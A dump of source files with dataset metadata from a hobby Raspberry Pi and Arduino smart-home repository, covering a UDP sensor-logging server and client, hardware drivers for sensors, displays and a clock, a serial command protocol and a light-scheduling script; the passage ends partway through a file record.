"content_id": "612626d1dad8b09cf58d377b3955cb05489aad71",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1507,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 44,
"path": "/lib/PyUdpServer/PyUdpServer.py",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n'''\nAll clients have to follow this format when sending to this server:\n 1. Use UDP\n 2. Port 9999\n 3. each payload format (as a string coded in ASCII):\n ID;type;value\n ID: identity of the sender, e.g. \"kitchen_controller\"\n type: type of the report, e.g. \"temperature\", \"light\", \"infrared\"\n value: integer in unit of 0.001\n Exemples:\n \"frontyard_controller;temperature;-1900\" -> frontyard_controller sent us with temperature of -19.00 degree Celsius\n\n Database:\n Name: pysmarthouse.db\n Database: sqlite3\n Table name: pysmarthouse\n Table format: (Time text, ID text, Type text, Value real)\n'''\nimport socketserver\nimport sqlite3\nimport datetime\n\nclass UDPHandler(socketserver.BaseRequestHandler):\n\n def __init__(self):\n super.__init__(self)\n self.conn = sqlite3.connect(\"./pysmarthouse.db\")\n self.c = self.conn.cursor()\n\n def handle(self):\n data = self.request[0].strip()\n socket = self.request[1]\n #socket.sendto(data.upper(), self.client_address)\n _id, _type, _value = data.split(';')\n _value = float(_value) / 100\n _time = str(datetime.datetime.utcnow())\n self.c.execute(\"INSERT INTO pysmarthouse VALUES (_time, _id, _type, _value)\")\n \n\nif __name__ == \"__main__\":\n HOST, PORT = \"\", 9999 ## all interfaces\n server = socketserver.UDPServer((HOST, PORT), UDPHandler)\n server.serve_forever()"
},
{
"alpha_fraction": 0.7016128897666931,
"alphanum_fraction": 0.7056451439857483,
"avg_line_length": 21.590909957885742,
"blob_id": "12978a1ff4a56f8f594fbb17b24745e253d56e13",
"content_id": "3a06bcdca5d2d56be6a559aae9b748c0ef132fe7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 496,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 22,
"path": "/ArduinoController/bitlashLightSensor.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n Provide bitlash wrap-up of a light sensor instance.\n Light sensor instance has to be:\n 1. named \"lightSensor\";\n 2. exist as global variale\n*/\n\nnumvar lightSensor_get(void)\n{\n return lightSensor.get();\n}\n\nnumvar lightsensor_pin(void)\n{\n return lightSensor.pin();\n}\n\nvoid register_bitlash_lightSensor(void)\n{\n addBitlashFunction(\"lightSensor_get\", (bitlash_function) lightSensor_get);\n addBitlashFunction(\"lightsensor_pin\", (bitlash_function) lightsensor_pin);\n}"
},
{
"alpha_fraction": 0.6666666865348816,
"alphanum_fraction": 0.6747967600822449,
"avg_line_length": 17.636363983154297,
"blob_id": "26c5b77ef9bfcb308b177a89576b1cf429d21257",
"content_id": "c11dccad7fd08ef6805703d238d8228fbb434ee5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 615,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 33,
"path": "/lib/InfraredSensor/InfraredSensor.cpp",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n Copyright (C) 2014 Michael Duo Ling <[email protected]>\n\n This program is free software; you can redistribute it and/or\n modify it under the terms of the GNU General Public License\n version 2 as published by the Free Software Foundation.\n */\n\n#include \"InfraredSensor.h\"\n\nInfraredSensor::InfraredSensor(unsigned int __pin): _pin(__pin)\n{\n}\n\nvoid InfraredSensor::begin()\n{\n pinMode(_pin, INPUT);\n}\n\nunsigned int InfraredSensor::pin()\n{\n return _pin;\n}\n\nbool InfraredSensor::get()\n{\n if (digitalRead(_pin) == InfraredSensor_ON)\n {\n return InfraredSensor_ON;\n } else {\n return InfraredSensor_OFF;\n }\n}\n"
},
{
"alpha_fraction": 0.6638655662536621,
"alphanum_fraction": 0.7478991746902466,
"avg_line_length": 29,
"blob_id": "6dbce8fe0b05c7613b9fec103d552f397acf884c",
"content_id": "b9641597a11fa18b1b2ba4416c347d59caeedb6e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 119,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 4,
"path": "/lib/OneWire/README.txt",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "From: http://www.pjrc.com/teensy/td_libs_OneWire.html\n\nInteresting sites:\n http://bildr.org/2011/07/ds18b20-arduino/"
},
{
"alpha_fraction": 0.5759096741676331,
"alphanum_fraction": 0.5947302579879761,
"avg_line_length": 24.74193572998047,
"blob_id": "d2d5ef1822260ddadc03c34654564b034aff02a9",
"content_id": "b9fdf44e67c7598d8e7d7ea109ceaa97df8238b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 797,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 31,
"path": "/WebInterface/python/test/UdpClient.py",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#!/bin/env python3\n\nimport socket\nimport sys #for exit\n\ntry:\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.settimeout(3)\nexcept socket.error:\n print('Failed to create socket')\n sys.exit()\n\nhost = 'localhost';\nport = 9999;\n\nwhile(1) :\n msg = input('Enter message to send : ')\n\n try :\n #Set the whole string\n s.sendto(msg.encode(encoding=\"ASCII\"), (host, port))\n # receive data from client (data, addr)\n d = s.recvfrom(1024)\n reply = d[0]\n addr = d[1]\n print('Server reply : ' + reply.decode(encoding=\"ASCII\"))\n except socket.timeout as msg:\n print(\"No response from server before timeout.\")\n except socket.error as msg:\n print('Error Code : ' + str(msg[0]) + ' Message ' + msg[1])\n sys.exit()"
},
{
"alpha_fraction": 0.453341007232666,
"alphanum_fraction": 0.47734254598617554,
"avg_line_length": 24.15458869934082,
"blob_id": "e25d2dc74817c50d03df7cfda3374f74f9ed37bb",
"content_id": "a8a724ce2e616e412d213f14037b97b98353f00f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 5208,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 207,
"path": "/MiniTempSensor/FourDigitDisplay.cpp",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n*/\n#include \"FourDigitDisplay.h\"\n\n/****************************************************************************/\n\nFourDigitDisplay::FourDigitDisplay( int _d1, int _d2, int _d3, int _d4,\n int _sA, int _sB, int _sC, int _sD, int _sE, int _sF, int _sG,\n int _dp):\n d1(_d1), d2(_d2), d3(_d3), d4(_d4),\n sA(_sA), sB(_sB), sC(_sC), sD(_sD), sE(_sE), sF(_sF), sG(_sG),\n dp(_dp)\n{\n int i;\n\n // set digital selection pin array\n d_pins[0] = d1; d_pins[1] = d2; d_pins[2] = d3; d_pins[3] = d4;\n min_value = -999;\n max_value = 9999;\n\n // set segment selection pin array\n s_pins[0] = sA; s_pins[1] = sB; s_pins[2] = sC; s_pins[3] = sD;\n s_pins[4] = sE; s_pins[5] = sF; s_pins[6] = sG;\n}\n\nvoid FourDigitDisplay::init() {\n int i;\n for (i=0; i<4; i++) {\n pinMode(d_pins[i], OUTPUT);\n //digitalWrite(d_pins[i], HIGH);\n }\n for (i=0; i<7; i++) {\n pinMode(s_pins[i], OUTPUT);\n //digitalWrite(s_pins[i], LOW);\n }\n pinMode(dp, OUTPUT);\n //digitalWrite(dp, LOW);\n clear();\n}\n\nvoid FourDigitDisplay::select_digit(byte nr) {\n int i;\n switch (nr) {\n case 1:\n case 2:\n case 3:\n case 4:\n for (i=0; i<4; i++) {\n digitalWrite(d_pins[i], HIGH);\n }\n digitalWrite(d_pins[nr-1], LOW);\n }\n}\n\nvoid FourDigitDisplay::digit(byte d, boolean use_dp = false) {\n int i;\n byte pattern;\n if (d < 11) {\n pattern = DISPLAY_PATTERNS[d];\n for (i=0; i<7; i++) {\n digitalWrite(s_pins[i], (pattern >> i) & 1);\n }\n digitalWrite(dp, (pattern >> 7) & 1); // decimal point for out of range pattern\n }\n if (use_dp) {\n digitalWrite(dp, HIGH);\n }\n delayMicroseconds(10);\n}\n\nvoid FourDigitDisplay::clear() {\n int i;\n for (i=0; i<4; i++) {\n digitalWrite(d_pins[i], HIGH);\n }\n for (i=0; i<7; i++) {\n digitalWrite(s_pins[i], LOW);\n }\n digitalWrite(dp, LOW);\n}\n\nvoid FourDigitDisplay::_prepare(int value) {\n int d_index;\n if (value < min_value || value > max_value) {\n for (d_index=0; d_index<4; d_index++) {\n d_values[d_index] = DISPLAY_PATTERN_OUT_OF_RANGE;\n }\n return;\n }\n boolean is_minus = (value < 0);\n for (d_index=0; d_index<4; d_index++) {\n d_values[d_index] = 255;\n }\n d_index = 3;\n value = abs(value);\n do {\n d_values[d_index--] = value % 10;\n value /= 10;\n } while (value != 0);\n if (is_minus) {\n d_values[d_index] = 10; // minus sign\n }\n}\n\nvoid FourDigitDisplay::_prepare(double value) {\n int d_index;\n if (value < min_value || value > max_value) {\n for (d_index=0; d_index<4; d_index++) {\n d_values[d_index] = DISPLAY_PATTERN_OUT_OF_RANGE;\n }\n return;\n }\n boolean is_minus = (value < 0);\n for (d_index=0; d_index<4; d_index++) {\n d_values[d_index] = 255;\n }\n d_index = 3;\n long d_value = long(abs(value));\n do {\n d_values[d_index--] = d_value % 10;\n d_value /= 10;\n } while (d_value != 0);\n if (is_minus) {\n d_values[d_index] = 10; // minus sign\n }\n\n d_value = long(abs(value) * 10000);\n for (d_index=3; d_index>-1; d_index--) {\n f_values[d_index] = d_value % 10;\n d_value /= 10;\n }\n}\n\nvoid FourDigitDisplay::display(int value) {\n _prepare(value);\n _display(true);\n}\n\nvoid FourDigitDisplay::display(double value) {\n _prepare(value);\n _display(false);\n}\n\nvoid FourDigitDisplay::display(int value, unsigned long ms) {\n _prepare(value);\n unsigned long ms_prev = millis();\n unsigned long ms_now = ms_prev;\n int i;\n do {\n ms -= ms_now - ms_prev;\n for (i=0; i<1000; i++) {\n _display(true);\n }\n ms_now = millis();\n } while (ms > ms_now - ms_prev);\n}\n\nvoid FourDigitDisplay::display(double value, unsigned long ms) {\n _prepare(value);\n unsigned long ms_prev = millis();\n unsigned long ms_now = ms_prev;\n int i;\n do {\n ms -= ms_now - ms_prev;\n for (i=0; i<1000; i++) {\n _display(false);\n }\n ms_now = millis();\n } while (ms > ms_now - ms_prev);\n}\n\n/*\n This function assumes the d_values[] contains process digits and minus sign\n for the integer part, f_values[] contains process digits for the float part.\n*/\nvoid FourDigitDisplay::_display(boolean only_int) {\n int d_index, i;\n if (only_int) {\n d_index = 4;\n i = 3;\n do {\n clear();\n select_digit(d_index--);\n digit(d_values[i--]);\n } while (d_values[i] != 255);\n } else {\n d_index = 1;\n for (i=0; i<4; i++) {\n if (d_values[i] != 255) {\n clear();\n select_digit(d_index++);\n if (i==3) {\n digit(d_values[i], true);\n } else {\n digit(d_values[i]);\n }\n }\n }\n i = 0;\n while (d_index < 5) {\n clear();\n select_digit(d_index++);\n digit(f_values[i++]);\n }\n }\n clear();\n}\n\n"
},
{
"alpha_fraction": 0.6490118503570557,
"alphanum_fraction": 0.6600790619850159,
"avg_line_length": 19.704917907714844,
"blob_id": "687dc0ca35398e721827ff4364114376cc06c9fe",
"content_id": "78bbef6e3a41f79845feaaaf671e38fc0fbf256f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1265,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 61,
"path": "/WifiCar/UltraSoundDistanceMeas.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n Copyright (C) 2014 Michael Duo Ling <[email protected]>\n\n This program is free software; you can redistribute it and/or\n modify it under the terms of the GNU General Public License\n version 2 as published by the Free Software Foundation.\n */\n\n/**\n * @file UltraSoundDistanceMeas.h\n *\n * Class declaration for UltraSoundDistanceMeas\n */\n\n#ifndef __UltraSoundDistanceMeas_H__\n#define __UltraSoundDistanceMeas_H__\n\n#include <Arduino.h>\n\n// speed of ultra sound: 340 m/s = 340 um/us\n#define ULTRASOUND_SPEED 340\n\nclass UltraSoundDistanceMeas\n{\nprivate:\n unsigned int trig_pin;\n unsigned int echo_pin;\n\npublic:\n\n /**\n * @name Primary public interface\n *\n * These are the main methods you need to operate the chip\n */\n /**@{*/\n\n /**\n * Constructor\n *\n * Creates a new instance of this driver. Before using, create\n * an instance and send in the unique pins that this chip is\n * connected to.\n *\n * @param trig_pin The pin attached to Trig\n * @param echo_pin The pin attached to Echo\n */\n UltraSoundDistanceMeas(unsigned int _trig_pin, unsigned int _echo_pin);\n\n /**\n * Turn light on with given color.\n */\n unsigned long measure(void);\n\n void init(void);\n\n /**@}*/\n\n};\n\n#endif // __UltraSoundDistanceMeas_H__\n\n\n"
},
{
"alpha_fraction": 0.47085610032081604,
"alphanum_fraction": 0.5368852615356445,
"avg_line_length": 26.11111068725586,
"blob_id": "c08c34a752eceb489953eb06dca520d60cca41f7",
"content_id": "8a774d51c49275da725ce633c321c4c36e875739",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2196,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 81,
"path": "/MiniTempSensor/MiniTempSensor.ino",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n Copyright (C) 2014 Michael Duo Ling <[email protected]>\n\n This program is free software; you can redistribute it and/or\n modify it under the terms of the GNU General Public License\n version 2 as published by the Free Software Foundation.\n\n Connection:\n # DS18B20 <-> Pro Mini\n GND -> GND\n VCC -> 5V\n DATA -> 4.7 kOhm -> 5V\n DATA -> PIN_D2\n\n # 4-digit 7-segment display <-> Pro Mini\n digit_1 <- PIN_12 <-> PIN_D0\n digit_2 <- PIN_1 <-> PIN_D1\n digit_3 <- PIN_5 <-> PIN_D12\n digit_4 <- PIN_9 <-> PIN_D13\n segment_A <- PIN_14 <-> PIN_D4\n segment_B <- PIN_8 <-> PIN_D5\n segment_C <- PIN_6 <-> PIN_D6\n segment_D <- PIN_2,7 <-> PIN_D7\n segment_E <- PIN_4 <-> PIN_D8\n segment_F <- PIN_13 <-> PIN_D9\n segment_G <- PIN_10 <-> PIN_D10\n decimal_point <- PIN_3 <-> PIN_D11\n\nObservations:\n 1. the reading from DS18B20 seems to be drifting quite much ~2 degrees after boot up;\n 2. the reading from DS18B20 seems to drift slightly after the initial big drift stops;\n\nTODO:\n 1. Attach a F2481AH 4-digits 7-segment display;\n*/\n\n#include <Arduino.h>\n#include \"TemperatureSensor.h\"\n#include \"FourDigitDisplay.h\"\n\nconst unsigned long UPDATE_INTERVAL_MS = 60000; // update every 60 seconds\n\n//#define ENABLE_DEBUG\n\nOneWire ds(2);\nFourDigitDisplay fdd(0, 1, 12, 13, 4, 5, 6, 7, 8, 9, 10, 11);\n\nvoid setup() {\n Serial.end();\n fdd.init();\n}\n\n#ifdef ENABLE_DEBUG\n int test_values[9] = {-999, -87, -6, 0, 12, 345, 6789, 9999, 0};\n#endif\n\nvoid loop() {\n int i;\n float temperature = get_temperature(&ds);\n int int_temp = int(temperature);\n #ifdef ENABLE_DEBUG\n //Serial.println(temperature);\n int j;\n /*\n delay(500);\n for (i=1; i<5; i++) {\n fdd.select_digit(i);\n for (j=0; j<10; j++) {\n fdd.digit(j);\n delay(100);\n }\n }*/\n delay(500);\n fdd.display(1.23, 2000);/*\n for (i=0; i<1000; i++) {\n fdd.display(45);\n }*/\n #else\n fdd.display(temperature, UPDATE_INTERVAL_MS);\n #endif\n}\n"
},
{
"alpha_fraction": 0.5611672401428223,
"alphanum_fraction": 0.5978301763534546,
"avg_line_length": 27.12631607055664,
"blob_id": "b4009a7c0e55c814005bb2f6fd6cfaf8dc7922bc",
"content_id": "b81deb08a485244c34c3d633f30f65fe67a699b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2673,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 95,
"path": "/LcdDisplay/DS3231.cpp",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "\n#include \"DS3231.h\"\n\n\nDS3231::DS3231(int _i2c_addr):\n i2c_addr(_i2c_addr)\n{\n}\n\nvoid DS3231::begin() {\n Wire.begin();\n}\n\n// Convert normal decimal numbers to binary coded decimal\nbyte DS3231::decToBcd(byte val)\n{\n return( (val/10*16) + (val%10) );\n}\n\n// Convert binary coded decimal to normal decimal numbers\nbyte DS3231::bcdToDec(byte val)\n{\n return( (val/16*10) + (val%16) );\n}\n\nvoid DS3231::setTime(byte second, byte minute, byte hour, byte dayOfWeek,\n byte dayOfMonth, byte month, byte year)\n{\n // sets time and date data to DS3231\n Wire.beginTransmission(i2c_addr);\n Wire.write(0); // set next input to start at the seconds register\n Wire.write(decToBcd(second)); // set seconds\n Wire.write(decToBcd(minute)); // set minutes\n Wire.write(decToBcd(hour)); // set hours\n Wire.write(decToBcd(dayOfWeek)); // set day of week (1=Sunday, 7=Saturday)\n Wire.write(decToBcd(dayOfMonth)); // set date (1 to 31)\n Wire.write(decToBcd(month)); // set month\n Wire.write(decToBcd(year)); // set year (0 to 99)\n Wire.endTransmission();\n}\n\nvoid DS3231::_readTime()\n{\n Wire.beginTransmission(i2c_addr);\n Wire.write(0); // set DS3231 register pointer to 00h\n Wire.endTransmission();\n Wire.requestFrom(i2c_addr, 7);\n // request seven bytes of data from DS3231 starting from register 00h\n second = bcdToDec(Wire.read() & 0x7f);\n minute = bcdToDec(Wire.read());\n hour = bcdToDec(Wire.read() & 0x3f);\n dayOfWeek = bcdToDec(Wire.read());\n dayOfMonth = bcdToDec(Wire.read());\n month = bcdToDec(Wire.read());\n year = bcdToDec(Wire.read());\n}\n\nString DS3231::readTime()\n{\n _readTime();\n String s_time = String(\"\") + hour + \":\";\n //Serial.print(hour, DEC); Serial.print(\":\");\n if (minute < 10) {\n s_time += \"0\";\n }\n s_time += minute;\n //Serial.print(minute, DEC); Serial.print(\":\");\n s_time += \":\";\n if (second < 10) {\n s_time += \"0\";\n }\n s_time += second;\n //Serial.print(second, DEC); Serial.print(\" \");\n s_time += \" \";\n s_time += dayOfMonth;\n //Serial.print(dayOfMonth, DEC); Serial.print(\"/\");\n s_time += \"/\";\n s_time += month;\n //Serial.print(month, DEC); Serial.print(\"/\");\n s_time += \"/\";\n s_time += year;\n //Serial.print(month, DEC); Serial.print(\" \");\n s_time += \" \";\n switch (dayOfWeek) {\n case 1: s_time += \"Sun\"; break;\n case 2: s_time += \"Mon\"; break;\n case 3: s_time += \"Tue\"; break;\n case 4: s_time += \"Wed\"; break;\n case 5: s_time += \"Thu\"; break;\n case 6: s_time += \"Fri\"; break;\n case 7: s_time += \"Sat\"; break;\n default: break;\n }\n //Serial.println(dayOfWeek);\n return s_time;\n}\n"
},
{
"alpha_fraction": 0.6453900933265686,
"alphanum_fraction": 0.6897163391113281,
"avg_line_length": 30.33333396911621,
"blob_id": "c30258667558f8cb91fb7eea980555a57e87ddd2",
"content_id": "f648432e823c9eac0d7e0d40bddb8c3d71b563a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 564,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 18,
"path": "/lib/PyUdpServer/PyUdpClient.py",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\nimport socket\nimport sys\n\nHOST, PORT = \"192.168.31.107\", 9999\n# data = \" \".join(sys.argv[1:])\ndata = \"kitchen;temperature;-100\"\n\n# SOCK_DGRAM is the socket type to use for UDP sockets\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n# As you can see, there is no connect() call; UDP has no connections.\n# Instead, data is directly sent to the recipient via sendto().\nsock.sendto(bytes(data, \"ascii\"), (HOST, PORT))\n#received = str(sock.recv(1024), \"utf-8\")\n\nprint(\"Sent: {}\".format(data))\n#print(\"Received: {}\".format(received))\n"
},
{
"alpha_fraction": 0.6804733872413635,
"alphanum_fraction": 0.7396449446678162,
"avg_line_length": 41.25,
"blob_id": "c42fad1fb664aefdaca7710d78da457696473553",
"content_id": "c81a5a71227ffda0d8f37dcdc22945bd58391a80",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 169,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 4,
"path": "/pysmarthouse.sh",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n# control kitchen window light on GPIO #10\npython3 /home/pi/git/pysmarthouse/GpioOnSunSchedule/GpioOnSunSchedule.py -c \"Stockholm\" -p 10 -s 1 -d 1 -i 300 &\n"
},
{
"alpha_fraction": 0.6117277145385742,
"alphanum_fraction": 0.6150573492050171,
"avg_line_length": 33.21519088745117,
"blob_id": "7289bb1e600195862a6bc73eb46c0945bb0eb06d",
"content_id": "db513a4398f9e1c3ccb07312a3b936de556ba419",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5406,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 158,
"path": "/WifiCar/SerialProtocol/protocol.py",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "import logging\n\ndef segment(a_str, end_mark=';', seperator=':'):\n '''\n Segment a string to a tuple, for later analysis.\n '''\n logging.getLogger(__name__).debug('segment({}, {}, {}'.format(a_str, end_mark, seperator))\n result = tuple(a_str.split(end_mark)[0].split(seperator))\n logging.getLogger(__name__).debug('segment() = {}'.format(result))\n return result\n\ndef is_response(segment_list):\n if segment_list[0] == 'RSP':\n return True\n else:\n return False\n\ndef is_ok_response(segment_list):\n if is_response(segment_list):\n if segment_list[1] == 'OK':\n return True\n return False\n\ndef temperature(segment_list):\n return float(segment_list[2])\n\nclass NotPduException(Exception):\n pass\nclass EmptyPduException(Exception):\n pass\n\nclass Pdu:\n END_MARK, SEPARATOR = ';', ':'\n\nclass RxPdu(Pdu):\n MINIMUM_LENGTH = 2\n def __init__(self, a_str):\n if not isinstance(a_str, str):\n raise NotPduException(\"type({}) is {}, not a string\".format(a_str, type(a_str)))\n seg_list = a_str.split(Pdu.END_MARK)\n if len(seg_list) < 1:\n raise EmptyPduException(\"{} is too short to be an RxPdu\".format(seg_list))\n seg_list = seg_list[0]\n if len(seg_list) == 0: # empty string\n raise EmptyPduException(\"{} is too short to be an RxPdu\".format(seg_list))\n seg_list = seg_list.split(Pdu.SEPARATOR)\n if len(seg_list) < RxPdu.MINIMUM_LENGTH:\n raise EmptyPduException(\"{} is too short to be an RxPdu\".format(seg_list))\n self.type = seg_list[0]\n self.specific_fields = tuple(seg_list[1:])\n\n\nclass NotResponseException(Exception):\n pass\nclass IllegalStatusResponseException(Exception):\n pass\nclass MissingParameterResponseException(Exception):\n pass\nclass IllegalParameterResponseException(Exception):\n pass\n\nclass Response(RxPdu):\n OK, NOK, NOT_SUPPORTED, UNKNOWN = ('OK', 'NOK', 'NOT_SUPPORTED', 'UNKNOWN')\n TYPE = 'RSP'\n def __init__(self, a_str):\n super().__init__(a_str)\n if self.type != Response.TYPE:\n raise NotResponseException(\"type = {} is not a response\".format(self.type))\n self.status = Response.UNKNOWN\n status = self.specific_fields[0]\n if status == Response.OK:\n self.status = Response.OK\n elif status == Response.NOK:\n self.status = Response.NOK\n elif status == Response.NOT_SUPPORTED:\n self.status = Response.NOT_SUPPORTED\n else:\n raise IllegalStatusResponseException(\"status = {} is illegal\".format(status))\n self.parameters = tuple(self.specific_fields[1:])\n\nclass NotRxCmdException(Exception):\n pass\nclass RxCmd(RxPdu):\n EMPTY_CMD, NOK, NOT_SUPPORTED, UNKNOWN = ('', 'NOK', 'NOT_SUPPORTED', 'UNKNOWN')\n TYPE = 'CMD'\n def __init__(self, a_str):\n super().__init__(a_str)\n if self.type != RxCmd.TYPE:\n raise NotRxCmdException(\"type = {} is not a RxCmd\".format(self.type))\n self.cmd = RxCmd.EMPTY_CMD\n if len(self.specific_fields) > 0:\n self.cmd = self.specific_fields[0]\n\nclass TemperatureResponse(Response):\n def __init__(self, a_str):\n super().__init__(a_str)\n if len(self.parameters) == 0:\n raise MissingParameterResponseException()\n try:\n self.value = float(self.parameters[0])\n except ValueError:\n raise IllegalParameterResponseException(\"parameter = {} is illegal for a {}\".format(self.parameters[0], self.__class__))\n\nclass TxPdu(Pdu):\n MINIMUM_LENGTH = 2\n def __init__(self, pdu_type, specific_fields):\n assert isinstance(pdu_type, str)\n assert isinstance(specific_fields, tuple) or isinstance(specific_fields, list)\n self.type = pdu_type\n self.specific_fields = specific_fields\n def __str__(self):\n return self.__repr__()\n def __repr__(self):\n specific_fields = Pdu.SEPARATOR.join(self.specific_fields)\n return Pdu.END_MARK.join((Pdu.SEPARATOR.join((self.type, specific_fields)),'\\n'))\n\nclass Command(TxPdu):\n TYPE = 'CMD'\n def __init__(self, specific_fields):\n super().__init__(Command.TYPE, specific_fields)\n\nclass TemperatureCommand(Command):\n CMD = 'TEMPER'\n def __init__(self):\n super().__init__((TemperatureCommand.CMD,))\n\nclass MotorForwardCommand(Command):\n def __init__(self):\n super().__init__((\"FORWARD\",))\nclass MotorBackwardCommand(Command):\n def __init__(self):\n super().__init__((\"BACKWARD\",))\nclass MotorStopCommand(Command):\n def __init__(self):\n super().__init__((\"STOP\",))\nclass MotorSpeedUpCommand(Command):\n def __init__(self):\n super().__init__((\"SPEEDUP\",))\nclass MotorSpeedDownCommand(Command):\n def __init__(self):\n super().__init__((\"SPEEDDOWN\",))\nclass MotorTurnLeftCommand(Command):\n def __init__(self):\n super().__init__((\"TURNLEFT\",))\nclass MotorTurnRightCommand(Command):\n def __init__(self):\n super().__init__((\"TURNRIGHT\",))\n\nclass NotDebugMsgException(Exception):\n pass\n\nclass DebugMsg(RxPdu):\n TYPE = 'DEB'\n def __init__(self, a_str):\n super().__init__(a_str)\n if self.type != DebugMsg.TYPE:\n raise NotDebugMsgException(\"type = {} is not a debug message\".format(self.type))\n self.msg = Pdu.SEPARATOR.join(self.specific_fields)\n"
},
{
"alpha_fraction": 0.5828717350959778,
"alphanum_fraction": 0.6242011189460754,
"avg_line_length": 35.65625,
"blob_id": "911b54cec81fc872110dab29fc738b38a18e47a1",
"content_id": "9aec76eafb809b175210aa41f3aec2ea9bbcf1e7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2347,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 64,
"path": "/WebInterface/python/script.py",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "import webiopi\nimport datetime\nimport pygal\nimport db\n\nGPIO = webiopi.GPIO\n\nLIGHT = 17 # GPIO pin using BCM numbering\n\nHOUR_ON = 8 # Turn Light ON at 08:00\nHOUR_OFF = 18 # Turn Light OFF at 18:00\n\n# setup function is automatically called at WebIOPi startup\ndef setup():\n database = db.DB()\n for i in range(10):\n database.insert(db.ALL_IDS[0], db.ALL_TYPES[0], float(i*2+1), datetime.datetime.now()+datetime.timedelta(seconds=i))\n temperatures = list()\n for id, t, v, ts in database.get_records():\n temperatures.append( (ts, v), )\n #print(\"{:16s}{:16s}{:8.2f}\\t{:10s}\".format(id, t, v, str(ts)))\n print(temperatures)\n datey = pygal.DateY(x_label_rotation=20, range=(0, 25), explicit_size=True, width=500, height=400)\n datey.add(db.ALL_TYPES[0], temperatures)\n #datey.add(\"Visits\", [\n # (datetime.datetime(2013, 1, 2), 300),\n # (datetime.datetime(2013, 1, 12), 412),\n # (datetime.datetime(2013, 2, 2), 823),\n # (datetime.datetime(2013, 2, 22), 672)])\n datey.render_to_file('bar_chart.svg')\n # bar_chart = pygal.Bar() # Then create a bar graph object\n # bar_chart.add('Fibonacci', [0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55]) # Add some values\n # bar_chart.render_to_file('bar_chart.svg')\n # set the GPIO used by the light to output\n GPIO.setFunction(LIGHT, GPIO.OUT)\n\n # retrieve current datetime\n now = datetime.datetime.now()\n\n # test if we are between ON time and tun the light ON\n if ((now.hour >= HOUR_ON) and (now.hour < HOUR_OFF)):\n GPIO.digitalWrite(LIGHT, GPIO.HIGH)\n\n# loop function is repeatedly called by WebIOPi \ndef loop():\n # retrieve current datetime\n now = datetime.datetime.now()\n\n # toggle light ON all days at the correct time\n if ((now.hour == HOUR_ON) and (now.minute == 0) and (now.second == 0)):\n if (GPIO.digitalRead(LIGHT) == GPIO.LOW):\n GPIO.digitalWrite(LIGHT, GPIO.HIGH)\n\n # toggle light OFF\n if ((now.hour == HOUR_OFF) and (now.minute == 0) and (now.second == 0)):\n if (GPIO.digitalRead(LIGHT) == GPIO.HIGH):\n GPIO.digitalWrite(LIGHT, GPIO.LOW)\n\n # gives CPU some time before looping again\n webiopi.sleep(1)\n\n# destroy function is called at WebIOPi shutdown\ndef destroy():\n GPIO.digitalWrite(LIGHT, GPIO.LOW)\n\n"
},
{
"alpha_fraction": 0.5319284796714783,
"alphanum_fraction": 0.6085568070411682,
"avg_line_length": 25.116666793823242,
"blob_id": "767ff12e7c834a4e252b68feeaec155f77840418",
"content_id": "a8c588537d2f1ee3f1ac960f800c678b16bb11c3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1566,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 60,
"path": "/ArduinoController/bitlashDS18B20.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
